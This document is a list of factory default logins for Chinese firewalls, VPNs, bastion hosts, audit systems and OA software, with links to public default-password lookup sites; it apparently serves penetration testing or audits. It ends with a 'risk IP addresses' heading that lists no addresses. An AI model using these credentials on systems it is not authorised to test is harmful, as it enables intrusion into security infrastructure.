DAS-Security Mingyu firewall: admin / adminadmin
A certain bastion host: shterm / shterm
Topsec VPN: test / 123456
Seeyon OA
system user (default password: system; the system administrator in A8, the organization administrator in A6)
group-admin (default password: 123456; group administrator in the A8 Group edition)
admin1 (default password: 123456; organization administrator in the A8 Enterprise edition)
audit-admin (default password: 123456; audit administrator)
Weaver OA
username: sysadmin, password: 1
Security devices
Common security devices (in addition to the list above):
Huawei hyper-converged: admin, password Huawei12#$
Amaranten firewall: admin / manager
Mingyu WAF: admin / admin
Mingyu security gateway: admin / adminadmin
Venustech Tianqing Hanma: admin / veuns.fw, audit / veuns.audit
Netentsec log center: ns25000 / ns25000
Network security audit system (Zhongke Xinye): admin / 123456
LogBase log management audit system: admin / safetybase
Zhongxin Jindun hardware firewall: admin / 123
KILL firewall (Guanqun Jinchen): admin / sys123
Heidun firewall: admin / admin
XXX蒙 security products
IPS intrusion prevention system, SASH operations security management system, SAS security audit system, DAS database audit system, RSAS remote security assessment system, WAF web application firewall, UTS threat detection system
sysauditor/sysauditor
sysmanager/sysmanager
supervisor/supervisor
maintainer/maintainer
webpolicy/webpolicy
sysadmin/sysadmin
conadmin/conadmin
supervis/supervis
webaudit/webaudit
conadmin/nsfocus
weboper/weboper
auditor/auditor
nsadmin/nsadmin
admin/nsfocus
admin/admin
shell/shell
Default password lookup sites
https://CIRT.net https://cirt.net/passwords
Default password list
https://datarecovery.com/rd/default-passwords/
Toolmao router default password lookup
https://toolmao.com/baiduapp/routerpwd/
Recommended risk IP addresses to block
A deduplicated collection of risk IP addresses, sourced from intelligence communities and other intelligence groups.
If you observe related threat activity, it is recommended to block these addresses promptly.